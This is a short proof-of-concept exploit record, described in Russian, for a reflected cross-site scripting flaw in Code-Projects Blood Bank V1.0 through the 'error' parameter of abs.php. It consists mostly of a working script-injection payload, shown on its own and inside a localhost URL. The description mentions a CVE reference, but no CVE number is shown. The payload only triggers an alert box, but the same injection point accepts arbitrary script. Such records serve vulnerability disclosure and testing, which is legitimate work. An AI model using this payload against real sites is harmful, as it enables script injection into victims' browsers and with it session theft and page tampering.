
Proof-of-concept эксплойт для отражённой межсайтовой скриптовой атаки (XSS) в Code-Projects Blood Bank V1.0 через параметр 'error' в abs.php, с рабочим payload и ссылкой на CVE.
"><svg/onload=alert(document.domain)>http://localhost/bloodbank/abs.php?error="><svg/onload=alert(document.domain)>